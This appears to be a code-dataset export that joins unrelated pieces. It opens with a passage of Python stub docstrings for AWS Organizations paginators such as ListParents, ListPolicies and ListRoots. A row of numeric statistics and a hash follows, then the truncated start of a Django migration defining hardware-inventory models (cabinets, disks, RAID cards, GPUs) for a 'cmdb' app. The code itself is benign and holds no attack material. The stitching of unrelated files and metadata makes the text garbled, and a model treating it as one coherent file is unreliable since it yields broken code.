The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a parent ID string requires one of the following:
* Root: a string that begins with \"r-\" followed by from 4 to 32 lower-case letters or digits.
* Organizational unit (OU): a string that begins with \"ou-\" followed by from 4 to 32 lower-case letters or digits (the ID of the root that the OU is in) followed by a second \"-\" dash and from 8 to 32 additional lower-case letters or digits.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListParents(Paginator):
def paginate(self, ChildId: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_parents`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListParents>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ChildId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Parents': [
{
'Id': 'string',
'Type': 'ROOT'|'ORGANIZATIONAL_UNIT'
},
],
}
**Response Structure**
- *(dict) --*
- **Parents** *(list) --*
A list of parents for the specified child account or OU.
- *(dict) --*
Contains information about either a root or an organizational unit (OU) that can contain OUs or accounts in an organization.
- **Id** *(string) --*
The unique identifier (ID) of the parent entity.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a parent ID string requires one of the following:
* Root: a string that begins with "r-" followed by from 4 to 32 lower-case letters or digits.
* Organizational unit (OU): a string that begins with "ou-" followed by from 4 to 32 lower-case letters or digits (the ID of the root that the OU is in) followed by a second "-" dash and from 8 to 32 additional lower-case letters or digits.
- **Type** *(string) --*
The type of the parent entity.
:type ChildId: string
:param ChildId: **[REQUIRED]**
The unique identifier (ID) of the OU or account whose parent containers you want to list. Do not specify a root.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a child ID string requires one of the following:
* Account: a string that consists of exactly 12 digits.
* Organizational unit (OU): a string that begins with \"ou-\" followed by from 4 to 32 lower-case letters or digits (the ID of the root that contains the OU) followed by a second \"-\" dash and from 8 to 32 additional lower-case letters or digits.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListPolicies(Paginator):
def paginate(self, Filter: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_policies`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListPolicies>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filter='SERVICE_CONTROL_POLICY',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Policies': [
{
'Id': 'string',
'Arn': 'string',
'Name': 'string',
'Description': 'string',
'Type': 'SERVICE_CONTROL_POLICY',
'AwsManaged': True|False
},
],
}
**Response Structure**
- *(dict) --*
- **Policies** *(list) --*
A list of policies that match the filter criteria in the request. The output list does not include the policy contents. To see the content for a policy, see DescribePolicy .
- *(dict) --*
Contains information about a policy, but does not include the content. To see the content of a policy, see DescribePolicy .
- **Id** *(string) --*
The unique identifier (ID) of the policy.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a policy ID string requires "p-" followed by from 8 to 128 lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the policy.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Name** *(string) --*
The friendly name of the policy.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
- **Description** *(string) --*
The description of the policy.
- **Type** *(string) --*
The type of policy.
- **AwsManaged** *(boolean) --*
A boolean value that indicates whether the specified policy is an AWS managed policy. If true, then you can attach the policy to roots, OUs, or accounts, but you cannot edit it.
:type Filter: string
:param Filter: **[REQUIRED]**
Specifies the type of policy that you want to include in the response.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListPoliciesForTarget(Paginator):
def paginate(self, TargetId: str, Filter: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_policies_for_target`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListPoliciesForTarget>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TargetId='string',
Filter='SERVICE_CONTROL_POLICY',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Policies': [
{
'Id': 'string',
'Arn': 'string',
'Name': 'string',
'Description': 'string',
'Type': 'SERVICE_CONTROL_POLICY',
'AwsManaged': True|False
},
],
}
**Response Structure**
- *(dict) --*
- **Policies** *(list) --*
The list of policies that match the criteria in the request.
- *(dict) --*
Contains information about a policy, but does not include the content. To see the content of a policy, see DescribePolicy .
- **Id** *(string) --*
The unique identifier (ID) of the policy.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a policy ID string requires "p-" followed by from 8 to 128 lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the policy.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Name** *(string) --*
The friendly name of the policy.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
- **Description** *(string) --*
The description of the policy.
- **Type** *(string) --*
The type of policy.
- **AwsManaged** *(boolean) --*
A boolean value that indicates whether the specified policy is an AWS managed policy. If true, then you can attach the policy to roots, OUs, or accounts, but you cannot edit it.
:type TargetId: string
:param TargetId: **[REQUIRED]**
The unique identifier (ID) of the root, organizational unit, or account whose policies you want to list.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a target ID string requires one of the following:
* Root: a string that begins with \"r-\" followed by from 4 to 32 lower-case letters or digits.
* Account: a string that consists of exactly 12 digits.
* Organizational unit (OU): a string that begins with \"ou-\" followed by from 4 to 32 lower-case letters or digits (the ID of the root that the OU is in) followed by a second \"-\" dash and from 8 to 32 additional lower-case letters or digits.
:type Filter: string
:param Filter: **[REQUIRED]**
The type of policy that you want to include in the returned list.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListRoots(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_roots`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListRoots>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Roots': [
{
'Id': 'string',
'Arn': 'string',
'Name': 'string',
'PolicyTypes': [
{
'Type': 'SERVICE_CONTROL_POLICY',
'Status': 'ENABLED'|'PENDING_ENABLE'|'PENDING_DISABLE'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Roots** *(list) --*
A list of roots that are defined in an organization.
- *(dict) --*
Contains details about a root. A root is a top-level parent node in the hierarchy of an organization that can contain organizational units (OUs) and accounts. Every root contains every AWS account in the organization. Each root enables the accounts to be organized in a different way and to have different policy types enabled for use in that root.
- **Id** *(string) --*
The unique identifier (ID) for the root.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a root ID string requires "r-" followed by from 4 to 32 lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the root.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Name** *(string) --*
The friendly name of the root.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
- **PolicyTypes** *(list) --*
The types of policies that are currently enabled for the root and therefore can be attached to the root or to its OUs or accounts.
.. note::
Even if a policy type is shown as available in the organization, you can separately enable and disable them at the root level by using EnablePolicyType and DisablePolicyType . Use DescribeOrganization to see the availability of the policy types in that organization.
- *(dict) --*
Contains information about a policy type and its status in the associated root.
- **Type** *(string) --*
The name of the policy type.
- **Status** *(string) --*
The status of the policy type as it relates to the associated root. To attach a policy of the specified type to a root or to an OU or account in that root, it must be available in the organization and enabled for that root.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListTargetsForPolicy(Paginator):
def paginate(self, PolicyId: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_targets_for_policy`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListTargetsForPolicy>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PolicyId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Targets': [
{
'TargetId': 'string',
'Arn': 'string',
'Name': 'string',
'Type': 'ACCOUNT'|'ORGANIZATIONAL_UNIT'|'ROOT'
},
],
}
**Response Structure**
- *(dict) --*
- **Targets** *(list) --*
A list of structures, each of which contains details about one of the entities to which the specified policy is attached.
- *(dict) --*
Contains information about a root, OU, or account that a policy is attached to.
- **TargetId** *(string) --*
The unique identifier (ID) of the policy target.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a target ID string requires one of the following:
* Root: a string that begins with "r-" followed by from 4 to 32 lower-case letters or digits.
* Account: a string that consists of exactly 12 digits.
* Organizational unit (OU): a string that begins with "ou-" followed by from 4 to 32 lower-case letters or digits (the ID of the root that the OU is in) followed by a second "-" dash and from 8 to 32 additional lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the policy target.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Name** *(string) --*
The friendly name of the policy target.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
- **Type** *(string) --*
The type of the policy target.
:type PolicyId: string
:param PolicyId: **[REQUIRED]**
The unique identifier (ID) of the policy for which you want to know its attachments.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a policy ID string requires \"p-\" followed by from 8 to 128 lower-case letters or digits.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
| 61.280428
| 493
| 0.577945
| 6,858
| 62,935
| 5.268008
| 0.072908
| 0.01121
| 0.014172
| 0.015943
| 0.855126
| 0.843307
| 0.826257
| 0.814161
| 0.806217
| 0.800985
| 0
| 0.008516
| 0.333916
| 62,935
| 1,026
| 494
| 61.340156
| 0.853316
| 0.847446
| 0
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.309524
| false
| 0.309524
| 0.071429
| 0
| 0.690476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
0fd5cab9af7d7775ad8bcc60661c8aa38cdd8ec3
| 43,480
|
py
|
Python
|
cmdb/migrations/0001_initial.py
|
longgeek/muop_v1
|
e1dda2261384afb51429cfe1efbabdf17c2bbba0
|
[
"Apache-2.0"
] | null | null | null |
cmdb/migrations/0001_initial.py
|
longgeek/muop_v1
|
e1dda2261384afb51429cfe1efbabdf17c2bbba0
|
[
"Apache-2.0"
] | null | null | null |
cmdb/migrations/0001_initial.py
|
longgeek/muop_v1
|
e1dda2261384afb51429cfe1efbabdf17c2bbba0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2019-06-11 10:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('appconf', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AgentCompare',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('table', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u8868')),
('uuid', models.CharField(blank=True, max_length=100, verbose_name='UUID')),
('column', models.CharField(blank=True, max_length=50, verbose_name='\u5b57\u6bb5\u540d')),
('db_value', models.CharField(max_length=255, null=True, verbose_name='\u539f\u503c')),
('agent_value', models.CharField(max_length=255, null=True, verbose_name='\u65b0\u503c')),
('operation', models.CharField(blank=True, max_length=255, verbose_name='\u64cd\u4f5c')),
],
),
migrations.CreateModel(
name='Cabinet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='\u673a\u67dc')),
('desc', models.CharField(blank=True, max_length=100, verbose_name='\u63cf\u8ff0')),
],
),
migrations.CreateModel(
name='Fitting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingCard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('card_type', models.CharField(blank=True, max_length=50, verbose_name='\u677f\u5361\u7c7b\u578b')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingDisk',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('cache', models.CharField(blank=True, max_length=50, verbose_name='\u7f13\u5b58')),
('speed', models.CharField(blank=True, max_length=50, verbose_name='\u8f6c\u901f')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u5bb9\u91cf')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.CharField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('drive_letter', models.CharField(blank=True, max_length=100, verbose_name='\u76d8\u7b26')),
('level', models.CharField(blank=True, max_length=100, verbose_name='Raid\u7ea7\u522b')),
('slot_id', models.CharField(blank=True, max_length=100, verbose_name='\u76d8\u69fd')),
('state', models.CharField(blank=True, max_length=100, verbose_name='\u72b6\u6001')),
('type', models.CharField(blank=True, max_length=50, verbose_name='HDDorSSD')),
('vendor', models.CharField(blank=True, max_length=100, verbose_name='\u5382\u5bb6')),
('temperature', models.TextField(blank=True, max_length=50, verbose_name='\u6e29\u5ea6')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingGPU',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u663e\u5b58\u5bb9\u91cf')),
('frequency', models.CharField(blank=True, max_length=50, verbose_name='\u6838\u5fc3\u9891\u7387')),
('bus_id', models.CharField(blank=True, max_length=50, verbose_name='\u603b\u7ebfID')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fitting_type', models.CharField(blank=True, max_length=50, verbose_name='\u914d\u4ef6\u7c7b\u578b')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('operation', models.CharField(blank=True, max_length=50, verbose_name='\u64cd\u4f5c')),
('old_belong', models.CharField(blank=True, max_length=100, verbose_name='\u65e7\u5c5e\u4e3b')),
('new_belong', models.CharField(blank=True, max_length=100, verbose_name='\u65b0\u5c5e\u4e3b')),
('user', models.CharField(blank=True, max_length=50, verbose_name='\u64cd\u4f5c\u4eba')),
('time', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingMemory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('mem_type', models.CharField(blank=True, max_length=50, verbose_name='\u5185\u5b58\u7c7b\u578b')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u5bb9\u91cf')),
('frequency', models.CharField(blank=True, max_length=50, verbose_name='\u4e3b\u9891')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingMOD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('speed', models.CharField(blank=True, max_length=50, verbose_name='\u901f\u7387')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingNIC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('name', models.CharField(blank=True, max_length=50, verbose_name='\u7f51\u5361\u540d\u79f0')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('speed', models.CharField(blank=True, max_length=50, verbose_name='\u4f20\u8f93\u901f\u7387')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('bus_type', models.CharField(blank=True, max_length=50, verbose_name='\u603b\u7ebf\u7c7b\u578b')),
('nicip', models.CharField(blank=True, max_length=50, verbose_name='Ip\u5730\u5740')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingPower',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('name', models.CharField(blank=True, max_length=100, verbose_name='\u7535\u6e90\u540d\u5b57')),
('power', models.CharField(blank=True, max_length=50, verbose_name='\u529f\u7387')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingRaid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('level', models.CharField(blank=True, max_length=50, verbose_name='Raid\u7ea7\u522b')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('cache', models.CharField(blank=True, max_length=50, verbose_name='\u7f13\u5b58')),
('bios_version', models.CharField(blank=True, max_length=50, verbose_name='BIOS\u7248\u672c')),
('device_interface', models.CharField(blank=True, max_length=50)),
('device_present', models.CharField(blank=True, max_length=50)),
('host_interface', models.CharField(blank=True, max_length=50)),
('raid_level_supported', models.CharField(blank=True, max_length=50, verbose_name='raid\u652f\u6301\u7b49\u7ea7')),
('supported_drives', models.CharField(blank=True, max_length=50)),
('vd_degraded', models.CharField(blank=True, max_length=50)),
('vd_drives', models.CharField(blank=True, max_length=50)),
('vd_offline', models.CharField(blank=True, max_length=50)),
('virtual_drive_info', models.TextField(blank=True)),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingSSD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u5bb9\u91cf')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('discard_time', models.DateTimeField(blank=True, null=True)),
